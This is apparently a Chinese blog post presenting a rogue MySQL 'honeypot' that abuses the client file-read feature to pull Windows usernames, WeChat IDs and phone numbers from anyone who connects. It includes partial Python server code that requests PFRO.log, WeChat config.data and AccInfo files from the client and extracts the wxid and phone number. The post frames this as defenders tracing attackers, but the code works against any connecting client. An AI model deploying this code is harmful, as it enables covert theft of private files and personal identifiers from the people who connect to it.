【网络安全】如何通过蜜罐技术获取对方的手机号?_黑客教你查询某人手机号

最新推荐文章于 2024-05-31 00:13:51 发布
最新推荐文章于 2024-05-31 00:13:51 发布
阅读量1k 收藏 3
点赞数 5
分类专栏: 程序员 文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84239830/article/details/138386640
版权

获取windows用户名

我们这里在自己的电脑中进行测试,打开C:/Windows/PFRO.log,可以看到我的用户名是66396

获取wxid

然后,我们访问C:/Users/66396/Documents/WeChat Files/All Users/config/config.data

这里可以获取到wxid

获取手机号、微信号、地址

可以看到手机号

还有地址、微信号都有

=

上面是黑客入侵后,查看电脑中的文件可以获取到的信息,那么如何设计一个蜜罐,让黑客在攻击时自投罗网,帮助我们防守方溯源到攻击者的信息呢?

【→所有资源关注我,私信回复“资料”获取←】
1、网络安全学习路线
2、电子书籍(白帽子)
3、安全大厂内部视频
4、100份src文档
5、常见安全面试题
6、ctf大赛经典题目解析
7、全套工具包
8、应急响应笔记

四、核心代码

如何把上述过程进行自动化呢?我们可以看下核心代码
下面的代码主要有两个作用

判断是否为扫描器或者密码爆破工具,进行交互握手,效果是扫描器直接爆3306弱口令。
如果是直接连接,去读取设定好的文件,并写入本地保存。

def mysql\_get\_file\_content(filename,conn,address):
    logpath = os.path.abspath('.') + "/log/" + address[0]
    if not os.path.exists(logpath):
        os.makedirs(logpath)
    conn.sendall("xxx")
    try:
        conn.recv(1024000)
    except Exception as e:
        print(e)
    try:
        conn.sendall("xx")
        res1 = conn.recv(1024000)
        # SHOW VARIABLES
        if 'SHOW VARIABLES' in res1:
            conn.sendall("xxx")
            res2 = conn.recv(9999)
            if 'SHOW WARNINGS' in res2:
                conn.sendall("xxx")
                res3 = conn.recv(9999)
                if 'SHOW COLLATION' in res3:
                    conn.sendall("xxx")
                    res4 = conn.recv(9999)
                    if 'SET NAMES utf8' in res4:
                        conn.sendall("xxx")
                        res5 = conn.recv(9999)
                        if 'SET character\_set\_results=NULL' in res5:
                            conn.sendall("xxx")
                            conn.close()
                    else:
                        conn.close()
                else:
                    conn.close()
            else:
                conn.close()
        else:
            try:
                wantfile = chr(len(filename) + 1) + "\x00\x00\x01\xFB" + filename
                conn.sendall(wantfile)
                content=''
                while True:
                    data = conn.recv(1024)
                    print len(data)
                    content += data
                    if len(data) < 1024:
                        print 'ok'
                        break
                    
                conn.close()
                item=logpath + "/" + filename.replace("/", "\_").replace(":", "")+'\_'+str(random.random())
                if len(content) > 6:
                    with open(item, "w") as f:
                        f.write(content)
                        f.close()
                    return (True,content)
                else:
                    return (False,content)
            except Exception as e:
                print (e)
    except Exception as e:
        print (e)

为了防止读取文件内容不完整,可以加入while循环。

while True:
        conn, address = sv.accept()
        first_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        global files1
        global username
        global wx_id
        file=files1[0].replace('Administrator',username).replace('wx\_id',wx_id)
        res,content = mysql_get_file_content(file,conn,address)
        files1.append(files1[0])
        files1.remove(files1[0])
        if res:
            if 'PFRO' in file:
                username = get_username(content)
                s= "xx" % (xx)
                cursor.execute(s)
                data = cursor.fetchall()
                if len(data)==0:
                    s = "XX" % (xx)
                    cursor.execute(s)
                    db.commit()
                    print 'success:'+ file
                    insert_file(file,address,username)
            elif 'config.data'in file:
                content = content
                wxid = re.findall(r'WeChatFiles\(.\*)\config', content)[0]
                sql = "xxx" % (xxx)
                cursor.execute(sql)
                db.commit()
                wx_id=wxid
                img = qrcode.make('weixin://contacts/profile/'+wxid)
                img.save(os.path.abspath('.')+'/static/pic/'+wxid+'.png') 
                print 'success:'+ file
                insert_file(file,address,username)
            elif 'AccInfo' in file:
                content = content
                phone = re.findall(r'[0-9]{11}', content)[-1]


**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
2401_84239830
关注
专栏目录
[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探
杨秀璋的专栏
11-12 3万+
这是作者的系列网络安全自学程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。这篇文章简单叙述了Web安全学习路线,并实现了最简单的木马和病毒代码,希望对读者有所帮助。
(已更新)未来老婆查询生成器微信小程序源码下载支持流量主
05-24
这是一款未来老婆或女朋友查询生成器 玩法也就相当于类似之前很火的一款重生模拟器一样 通过自己的选项来鉴定出未来老婆 PS:只是娱乐别认真哈 另外这款小程序还有支持跳转其它小程序界面 另外还支持流量主模式哟 安装的话还是特别的简单的,只需要简单的上传到微信开发者工具 然后提交审核就可以了,连合法域名都不需要的
通过蜜罐技术获取攻击者手机号、微信号【网络安全
HBohan的博客
03-04 1万+
蜜罐是对攻击者的欺骗技术,用以监视、检测、分析和溯源攻击行为,其没有业务上的用途,所有流入/流出蜜罐的流量都预示着扫描或者攻击行为,因此可以比较好的聚焦于攻击流量。
微信小程序——获取当前人微信绑定的手机号码
我是我
10-12 1万+
做小程序项目时有一个需求,是点击某个按钮,之后要获取该微信绑定的手机号码, 1.第一步:写出页面 <!--index.wxml--> <view class="container"> <van-button type="info" bindtap="getPhoneNum">点击获取电话号码</van-button> </view> 2.第二步:在js中获取电话号码 在页面对应的js中写上getPhoneNum方法 2.1 获取微信用户绑定的手
JeePlus快速开发平台-validateMobile接口存在SQL注入漏洞_jeeplus快速开发平台 漏洞(1)
2301_77033340的博客
04-15 463
【代码】JeePlus快速开发平台-validateMobile接口存在SQL注入漏洞_jeeplus快速开发平台 漏洞(1)
爬取手机号
最新发布
qq_55279568的博客
05-31 634
链接地址:例如:https://haoma.baidu.com/phoneSearch?爬取前的excel表格(自己建立数据)
分享一个手机号归属地采集程序
weixin_33800463的博客
04-26 382
2019独角兽企业重金招聘Python工程师标准>>> ...
免费在线搜索人名、电话号码、个人信息、定位、联系信息以及地址的开源网站
热门推荐
代码讲故事
04-07 5万+
为大家推荐开源搜索电话号码及地址的网页。这些网站不仅提供了免费查找人员、电话号码、地址、区号、邮政编码和邮政编码的功能,还允许进行反向搜索,即通过输入电话号码找到相应的地址。 在当今信息化社会,开源搜索引擎为我们提供了极大的便利,尤其是在寻找人名、电话号码以及地址方面。这些开源网站通常利用公开的信息资源,为用户提供了一个强大的搜索平台。以下是一些推荐的开源搜索网站,它们可以帮助用户查找和验证个人或企业的联系信息。
数据采集简单示例:采集爱帮网电话号码
蚂蚁学Python
06-09 709
爱帮网单个网址:http://www.aibang.com/detail/17881112-420243957 截图: 本文采集该页面的标题和2个电话号码,具体的python代码: # -*- coding: UTF-8 -*- ''' Created on 2012-6-9 @author: crazyant ''' ...
供应链安全、勒索攻击、AI赋能——2022网络安全技术呈何趋势?
Anprou的博客
03-25 958
中国信息安全、腾讯安全联合实验室及腾讯研究院共同发布《2022产业安全十大趋势》,在“产业安全宏观态势”、“产业安全实践”、“产业安全技术演进”三个维度中,专家们对“技术演进”维度讨论的篇幅最长,着墨最多,行业反响者众。 技术进步及IT工业化水平的提升,给数字化带来了很大的助力,但技术赋能建设的同时也在赋能攻击,IT工业化水平提升的背后,是某个软件被攻陷会带来一连串下游企业受影响,XcodeGhost、Solarwinds……网络安全不再是特定人的专属,而是多数人都应该关心的工作,如何理解技术发展...
全国IP段查询黑客参考)
10-29
广东 58.60.0.0 58.63.255.255 219.128.0.0 219.137.255.255 218.13.0.0 218.20.255.255 61.140.0.0 61.146.255.255 125.88.0.0 125.95.255.255 202.96.0.0 202.97.64.255 202.103.128.0 202.105.255.255 121.32.0.0 121.36.255.255 121.8.0.0 121.15.255.255 59.32.0.0 59.43.255.255 广州 58.61.200.0 58.63.159.255 59.37.0.0 59.39.167.255 ....
全国手机号归属地抓取(不封ip,无限抓)
03-26
写的PHP手机号段归属地抓取,只需要手机号前七位就可准确抓取到归属地,选用的是138网的资源,测试不会封,不限次数抓取。
按关键词抓取电话号码精准度80%
12-24
带关键词抓取各种信息资源
网络安全最新网络安全工具大合集_remnux部署
2301_79985178的博客
05-04 698
Google开发的内存分析框架.– 提取易失性内存(RAM)中的样本.– 允许你从安卓手机中提取短信记录,通话记录,照片,浏览历史,以及密码。–一个网络取证分析框架.–一个网络嗅探工具能够记录所有的DNS响应和被动DNS– 十六进制编辑工具, 能够修改任意大小的硬盘二进制数据,内存,文件句柄– 一个已知漏洞数据库的集合支持CVEs的扩展信息。– 提供简化的便携的底层网络路由接口,包括网络地址操作,内核arp高速缓存,路由表查询和操作,网络防火墙,网络接口查询操作,IP隧道,二进制IP包和以太网传送框架。
[网络安全自学篇] 十.论文之基于机器学习算法的主机恶意代码
杨秀璋的专栏
09-15 1万+
这是作者的系列网络安全自学程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。本篇文章,作者将分享两篇论文,机器学习是如何运用到恶意代码攻击中的,并谈谈自己的理解,后续深入研究尝试分享相关实验,目前还是小白一只。基础性文章,希望对初学者有帮助,大神请飘过,谢谢各位看官!
MySQL蜜罐获取攻击者微信ID
Java0258的博客
01-06 578
前言 前些日子有人问到我溯源反制方面的问题,我就想到了MySQL任意文件读取这个洞,假设你在内网发现或扫到了一些MySQL的弱口令,你会去连吗? 原理 MySQL中 load data local infile '/etc/passwd' into table test fields terminated by '\n'; 语句可以读取客户端本地文件并插进表中,那么我们可以伪造一个恶意的服务器,向连接服务器的客户端发送读取文件的payload。这个技术并不新鲜,但是合理利用就能起到一些不错的成果。
八爪鱼采集:赶集网电话号码采集图文
a2534725767的博客
07-13 9838
赶集网电话号码采集       随着互联网的飞速发展,越来越多的人在网上找工作找房子,现在为大家介绍使用八爪鱼采集器采集赶集网电话号码的方法。 选择要采集的分类  1.打开赶集网首页选择你要采集的分类 2.选择好你要采集的分类,鼠标将页面拉至底部,点击选择该页面的极速版,如图中所示 3.打开的极速版如图所示,复制极速版的地址 打开采集软件,建
数据隐私的转化——网站获取手机号码、网页获取手机号码技术
MegaDADT的博客
10-26 1344
如何将数据隐私转化为市场优势? 数据时代,企业与客户的每一次交互,都将产生数据。这些客户数据的沉淀、分析、应用等,可助力企业完善客户数据管理,持续培育竞争优势。然而,在获取、处理数据等环节,企业很容易陷入客户信息安全、客户信任缺失、网站获取手机号码,合规等难题。 SAP 客户数据云,帮助企业实现透明的客户信息管理,确保数据安全的同时,助力企业。 收获可信任的客户关系:通过有效的客户信息保密和客户...
手机号截取
weixin_30734435的博客
09-22 388
<!DOCTYPE html> <html> <head lang="en"> <meta charset="UTF-8"> <title></title> <script src="jquery-1.7.2.js"></script> <scrip...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值